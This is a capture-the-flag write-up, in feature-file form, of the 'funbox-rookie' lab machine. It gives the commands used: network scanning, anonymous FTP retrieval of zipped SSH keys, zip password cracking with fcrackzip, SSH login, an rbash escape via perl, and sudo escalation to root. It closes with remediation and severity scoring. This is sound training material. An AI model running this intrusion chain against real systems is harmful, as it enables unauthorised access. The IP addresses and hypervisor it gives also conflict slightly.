## Version 1.4.1
## language: en

Feature:
  TOE:
    funbox-rookie
  Location:
    http://192.168.56.113/workinginprogress.php
  CWE:
    CWE-220: Storage of File With Sensitive Data Under FTP Root
  Rule:
    REQ.181: https://fluidattacks.com/products/rules/list/181/
  Goal:
    Get remote connection and root privileges
  Recommendation:
    Must avoid or be careful with expose sensitive data in services

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali            | 2021.1      |
    | Firefox         | 78.9.0esr   |
    | Nmap            | 7.91        |
    | VirtualBox      | 6.1         |
    | fcrackzip       | 1.0         |
  TOE information:
    Given I have the machine Lab running on VMware [evidence](01.png)
    And It is in my network
    When I scan my network to find which ip was assigned to it
    And I use the next Nmap command to do it
    """
    nmap 192.168.56.0/24
    """
    Then I got the result
    """
    Nmap scan report for 192.168.56.115
    Host is up (0.00037s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE
    21/tcp open  ftp
    22/tcp open  ssh
    80/tcp open  http
    """
    Then I know its ip is 192.168.56.115
    And It has ports 21 (FTP), 22 (SSH) and 80 (HTTP) opened

  Scenario: Normal use case
    Given HTTP is working on port 80
    When I access to http://192.168.56.115
    Then I see the webpage [evidence](02.png)

  Scenario: Static detection
    Given the page is an Apache default page
    Then there is no relevant source code to check

  Scenario: Dynamic detection
    Given I can't check the source code
    When I use Nmap to check the ip
    """
    nmap -A 192.168.56.115
    """
    Then I get [evidence](03.png)
    And I know I'm allowed to connect by FTP as anonymous
    When I connect to FTP service
    """
    ftp 192.168.56.115
    """
    And I login as anonymous
    And I list all files
    Then I get [evidence](04.png)
    And I see the files I can get
    When I use "mget *" to retrieve files
    And I check all non zip files
    Then I find a message in ".@users" file
    """
    Hi Users,

    be carefull with your keys. Find them in %yourname%.zip.
    The passwords are the old ones.

    Regards
    root
    """
    And I conclude keys for SSH connection are into the zip files
    And the usernames are the file names
    And I notice that it's very sensitive information
    And it shouldn't be there

  Scenario: Exploitation
    Given I need those keys
    And zip files are protected with passwords
    When I use fcrackzip to force them with
    """
    fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <user>.zip
    """
    Then I can get passwords for cathrine an tom users
    And I unzip the keys using
    """
    unzip <user>.zip
    """
    And I get keys named "id_rsa"
    When I try to connect by SSH using cathrine username
    """
    ssh -i id_rsa cathrine@192.168.56.115
    """
    Then I can't make a connection
    When I try it with tom user
    """
    ssh -i id_rsa tom@192.168.56.115
    """
    Then I get remote connection [evidence](05.png)
    And I notice cd command is restricted
    """
    tom@funbox2:~$ cd
    -rbash: cd: restricted
    """
    And I use the next command to solve it
    """
    perl -e 'exec "/bin/bash";'
    """
    When I use "id" command
    Then I get
    """
    uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),
    30(dip),46(plugdev),108(lxd)
    """
    And I know tom user has sudo privileges
    When I list all files
    And I check them
    Then I find in ".mysql_history" a password for tom user [evidence](06.png)
    When I try to escalate to root using
    """
    sudo su
    """
    And I use the password I found
    Then I am root [evidence](07.png)

  Scenario: Remediation
    Given FTP service directory contains sensitive information
    Then anonymous login should be disabled
    And if it's not possible, the sensible information should be removed

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.8/10 (High) - AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.7/10 (Medium) - /E:F/RL:O/RC:U/
  Environmental: Unique and relevant attributes to a specific user environment
    6.7/10 (Medium) - /CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2021-03-31
